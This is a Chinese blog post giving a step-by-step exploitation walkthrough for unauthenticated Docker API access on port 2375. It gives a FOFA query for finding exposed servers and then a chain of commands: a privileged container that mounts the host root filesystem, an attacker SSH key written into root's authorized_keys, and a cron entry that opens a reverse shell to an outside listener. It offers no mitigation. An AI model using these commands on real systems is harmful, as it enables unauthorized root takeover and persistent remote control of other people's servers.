他说你是座头鲸.|

vitara

园龄:3年4个月粉丝:1关注:5

📂漏洞
🔖碎片
2023-03-30 10:57阅读: 237评论: 0推荐: 0

Docker API 未授权访问漏洞

docker api未授权访问漏洞

00x1 漏洞成因

因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。

00x2 信息收集

FOFA中搜索port = 2375 && status_code = "404"

访问站点2375端口,显示

image-20230330103018706

访问/info目录,查看版本信息

image-20230330103048695

证明改站点存在docker未授权访问漏洞

00x3 漏洞利用

docker -H tcp://ip ps -a 查看容器
dokcer -H tcp:// images 查看镜像

为了获取宿主机的权限,我们需要把宿主机的根目录挂载到docker容器中

docker -H tcp://ip run -it  --privileged=true -v /:/mnt --entrypoint /bin/bash image-id

--privileged=true:使用该参数,container内的root拥有真正的root权限。

-v /:/mnt:将宿主机的根目录挂载到/mnt目录下

--entrypoint /bin/bash:指定镜像的默认入口命令,该入口命令会在启动容器时作为根命令执行,所有其他传入值作为该命令的参数,用法ENTRYPOINT command param1 param2

image-20230330104808232

现在就拿到了root权限,利用方式有很多种

ssh连接

 ssh-keygen -t rsa        //生成一个ssh公钥
 cat /root/.ssh/id_rsa.pub       //查看生成的公钥
 echo "公钥内容" > /mnt/root/.ssh/authorized_keys   //写公钥
 ssh root@目标ip -i id_rsa    //ssh进行连接

写计划任务

nc -lvvp port 		//开启监听
echo "* * * * * /bin/bash -i >& /dev/tcp/ip/port 0>&1" >  /mnt/var/spool/cron/root   	///反弹shell

本文作者:vitara

本文链接:https://www.cnblogs.com/vitara/p/17271816.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   vitara  阅读(237)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起
  1. 1 尚好的青春 孙燕姿
  2. 2 孙燕姿
  3. 3 克卜勒 孙燕姿
- 孙燕姿
00:00 / 00:00
An audio error has occurred, player will skip forward in 2 seconds.